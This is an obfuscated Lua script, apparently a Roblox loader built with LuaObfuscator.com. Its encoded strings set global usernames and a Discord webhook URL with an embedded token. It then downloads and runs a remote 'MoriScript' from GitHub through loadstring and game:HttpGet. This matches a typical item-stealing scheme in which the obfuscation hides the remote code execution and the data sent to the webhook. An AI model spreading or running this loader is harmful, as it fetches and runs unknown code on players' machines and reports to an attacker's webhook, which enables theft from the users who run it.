--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v81=0;local v82;while true do if (v81==(927 -(214 + 713))) then v82=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 -(1065 -(68 + 997)))) -(v32-(2 -1))) + (1638 -(1523 + 114)))) ;return v82-(v82%(1 + 0)) ;end end else local v83=(621 -(555 + 64))^(v32-(932 -(857 + (1344 -(226 + 1044))))) ;return (((v31%(v83 + v83))>=v83) and (1 -(0 -0))) or (568 -(367 + 201)) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (120 -(32 + 85)) );v19=v19 + (961 -(892 + 65)) ;return (v37 * ((16442165 -(87 + 263)) + 335401)) + (v36 * (121138 -55602)) + (v35 * (469 -213)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;while true do local v66=0;while true do if (v66~=1) then else if (v38==2) then local v97=0 + 0 ;while true do if (v97~=1) then else for v103=1 -0 ,v24() do local v104=0;local v105;local v106;local v107;while true do if (v104==(0 -0)) then v105=0;v106=nil;v104=1 + 0 ;end if (v104==1) then v107=nil;while true do if (v105~=(0 -0)) then else v106=0;v107=nil;v105=1;end if (v105~=(15 -(9 + 5))) then else while true do if (0==v106) then v107=v22();if (v21(v107,377 -(85 + 291) ,1)~=0) then else local v164=0;local v165;local v166;local v167;local v168;while true do if (v164~=(1267 -(243 + 1022))) then else while true do if (v165==0) then v166=v21(v107,7 -5 ,3 + 0 );v167=v21(v107,1184 -(1123 + 57) ,6);v165=1 + 0 ;end if (v165~=(255 -(163 + 91))) then else local v171=0;while true do if (v171==(1930 -(1869 + 61))) then v168={v23(),v23(),nil,nil};if (v166==(0 -0)) then local v177=0 + 0 ;local v178;local v179;while true do if (v177~=(1 -0)) then else while true do if (v178==0) then v179=0 + 0 ;while true do if (v179==(1474 -(1329 + 145))) then v168[974 -(140 + 831) ]=v23();v168[1854 -(1409 + 441) ]=v23();break;end end break;end end break;end if ((718 -(15 + 703))==v177) then v178=0;v179=nil;v177=1 + 0 ;end end elseif (v166==1) then v168[441 -(262 + 176) ]=v24();elseif (v166==(1723 -(345 + 1376))) then v168[691 -(198 + 490) ]=v24() -((8 -6)^(38 -22)) ;elseif (v166==3) then local v183=1206 -(696 + 510) ;local v184;local v185;while true do if (v183~=0) then else local v192=0 -0 ;while true do if (v192==(1262 -(1091 + 171))) then v184=0 + 0 ;v185=nil;v192=1;end if (v192==(3 -2)) then v183=3 -2 ;break;end end end if (v183==1) then while true do if (v184~=(374 -(123 + 251))) then else v185=0;while true do if (v185~=0) then else v168[3]=v24() -(2^16) ;v168[19 -15 ]=v23();break;end end break;end end break;end end end v171=1;end if (v171==1) then v165=2;break;end end end if ((700 -(208 + 490))~=v165) then else local v172=0;local v173;while true do if (v172~=0) then else v173=0 + 0 ;while true do if (v173~=(1 + 0)) then else v165=839 -(660 + 176) ;break;end if (v173==(0 + 0)) then local v180=202 -(14 + 188) ;while true do if (v180==(676 -(534 + 141))) then v173=1;break;end if (v180~=0) then else if (v21(v167,1 + 0 ,1 + 0 )~=(1 + 0)) then else v168[3 -1 ]=v44[v168[2 -0 ]];end if (v21(v167,2,2)~=1) then else v168[8 -5 ]=v44[v168[2 + 1 ]];end v180=1 + 0 ;end end end end break;end end end if (v165==(399 -(115 + 281))) then if (v21(v167,3,6 -3 )==(1 + 0)) then v168[9 -5 ]=v44[v168[14 -10 ]];end v39[v103]=v168;break;end end break;end if (v164==(867 -(550 + 317))) then local v170=0;while true do if ((1 -0)==v170) then v164=1 -0 ;break;end if (v170~=(0 -0)) then else v165=0;v166=nil;v170=1;end end end if (v164==(286 -(134 + 151))) then v167=nil;v168=nil;v164=2;end end end break;end end break;end end break;end end end v38=3;break;end if (v97~=0) then else for v108=1666 -(970 + 695) ,v43 do local v109=0;local v110;local v111;local v112;while true do if (v109~=(1 -0)) then else v112=nil;while true do if (v110~=(1990 -(582 + 1408))) then else local v159=0;local v160;while true do if (v159~=(0 -0)) then else v160=0;while true do if (v160~=1) then else v110=1;break;end if (v160~=0) then else local v169=0 -0 ;while true do if (1~=v169) then else v160=1;break;end if (v169~=(0 -0)) then else v111=v22();v112=nil;v169=1825 -(1195 + 629) ;end end end end break;end end end if (v110==1) then if (v111==(1 -0)) then v112=v22()~=0 ;elseif (v111==(243 -(187 + 54))) then v112=v25();elseif (v111~=(783 -(162 + 618))) then else v112=v26();end v44[v108]=v112;break;end end break;end if (v109~=0) then else local v153=0 + 0 ;while true do if (1==v153) then v109=1;break;end if (v153~=0) then else v110=0;v111=nil;v153=1 + 0 ;end end end end end v42[6 -3 ]=v22();v97=1 -0 ;end end end if (v38~=1) then else local v98=0 + 0 ;local v99;while true do if (v98==0) then v99=1636 -(1373 + 263) ;while true do if (v99==0) then v42={v39,v40,nil,v41};v43=v24();v99=1 + 0 ;end if (v99~=(1 -0)) then else v44={};v38=2 -0 ;break;end end break;end end end break;end if (v66==(1384 -(746 + 638))) then local v89=0;while true do if (v89==1) then v66=1;break;end if (v89~=0) then else if (v38~=(2 + 1)) then else local v102=0 -0 ;while true do if (v102==0) then for v154=1,v24() do v40[v154-1 ]=v29();end return v42;end end end if (v38==(341 -(218 + 123))) then v39={};v40={};v41={};v38=1582 -(1535 + 46) ;end v89=1;end end end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v45=0;local v46;local v47;local v48;local v49;local v50;local v51;while true do if (v45==(2 + 0)) then v50=v21(v47,4 + 17 ,591 -(306 + 254) );v51=((v21(v47,2 + 30 )==(1 -0)) and  -(1468 -(899 + 568))) or (1 + 0) ;v45=7 -4 ;end if (v45==(604 -(268 + 335))) then v48=1 + 0 ;v49=(v21(v47,291 -(60 + 230) ,592 -(426 + 146) ) * ((1 + (1172 -(418 + 753)))^(1488 -(282 + 448 + 726)))) + v46 ;v45=(84 + 729) -(569 + 242) ;end if (v45==(8 -5)) then if (v50==(0 + 0 + 0)) then if (v49==0) then return v51 * (1024 -(179 + 527 + 318)) ;else v50=1;v48=1251 -((1250 -(406 + 123)) + 530) ;end elseif (v50==(3318 -(945 + 326))) then return ((v49==(0 -0)) and (v51 * ((1 + (1769 -(1749 + 20)))/(700 -(271 + 429))))) or (v51 * NaN) ;end return v8(v51,v50-1023 ) * (v48 + (v49/((2 + 0)^(1552 -(1408 + 92))))) ;end if (v45==(1086 -(461 + 625))) then v46=v24();v47=v24();v45=1289 -(993 + 295) ;end end end v26=nil;function v26(v52)local v53=0 + 0 ;local v54;local v55;while true do if (v53==((1908 -(57 + 527)) -(1249 + 73))) then v55={};for v90=1, #v54 do v55[v90]=v2(v1(v3(v54,v90,v90)));end v53=2 + 1 ;end if (v53==(1145 -(466 + 679))) then v54=nil;if  not v52 then local v96=0 -0 ;while true do if (v96==(0 -0)) then v52=v24();if (v52==(1900 -((1533 -(41 + 1386)) + (1908 -(4 + 110))))) then return "";end break;end end end v53=1 + 0 ;end if ((1 + 2)==v53) then return v6(v55);end if (v53==(1 + 0)) then v54=v3(v16,v19,(v19 + v52) -(2 -1) );v19=v19 + v52 ;v53=5 -3 ;end end end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57,v58=v1(v16,v19,v19 + (3 -1) );v19=v19 + (5 -3) ;return (v58 * (422 -(122 + 44))) + v57 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59)if (v1(v59,2)==79) then v20=v0(v3(v59,1,1));return "";else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v59,16));if v20 then local v100=v5(v85,v20);v20=nil;return v100;else return v85;end break;end end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v67=v63;local v68=v64;local v69=v65;local v70=v28;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=8) then if (v80<=3) then if (v80<=1) then if (v80==0) then v77[v79[2]]=v62[v79[3]];else do return;end end elseif (v80==2) then v77[v79[2]][v79[3]]=v79[4];else v77[v79[2]]=v62[v79[3]];end elseif (v80<=5) then if (v80>4) then v77[v79[2]]=v79[3];else do return;end end elseif (v80<=6) then local v121=v79[2];local v122,v123=v70(v77[v121](v13(v77,v121 + 1 ,v79[3])));v72=(v123 + v121) -1 ;local v124=0;for v145=v121,v72 do v124=v124 + 1 ;v77[v145]=v122[v124];end elseif (v80==7) then local v148=v79[2];v77[v148]=v77[v148](v13(v77,v148 + 1 ,v72));else v77[v79[2]]();end elseif (v80<=12) then if (v80<=10) then if (v80>9) then local v125=0;local v126;local v127;local v128;local v129;while true do if (v125==1) then v72=(v128 + v126) -1 ;v129=0;v125=2;end if (v125==0) then v126=v79[2];v127,v128=v70(v77[v126](v13(v77,v126 + 1 ,v79[3])));v125=1;end if (v125==2) then for v157=v126,v72 do local v158=0;while true do if (v158==0) then v129=v129 + 1 ;v77[v157]=v127[v129];break;end end end break;end end else v77[v79[2]]=v79[3];end elseif (v80==11) then v77[v79[2]]=v79[3]~=0 ;else local v133=v79[2];local v134=v77[v79[3]];v77[v133 + 1 ]=v134;v77[v133]=v134[v79[4]];end elseif (v80<=14) then if (v80==13) then v77[v79[2]][v79[3]]=v79[4];else v77[v79[2]]();end elseif (v80<=15) then local v140=v79[2];local v141=v77[v79[3]];v77[v140 + 1 ]=v141;v77[v140]=v141[v79[4]];elseif (v80==16) then v77[v79[2]]=v79[3]~=0 ;else local v151=v79[2];v77[v151]=v77[v151](v13(v77,v151 + 1 ,v72));end v71=v71 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0A3O0003023O005F4703083O00557365724E616D65030E3O00447261676F6E626C6173743O6503093O00557365724E616D653203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O3234322O342O31372O3130382O3631322F43374B744E69706C6A39385158796D336945636132494A6A7739756944725F456C353156715651556A657632546B336C44435136665F474D4E612D67336973474556362D030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A000F3O0012033O00013O0030023O000200030012033O00013O0030023O000400030012033O00013O0030023O000500060012033O00073O001203000100083O00200C0001000100090012050003000A4O0010000400014O000A000100044O00115O00022O00083O000100012O00043O00017O00",v9(),...);end
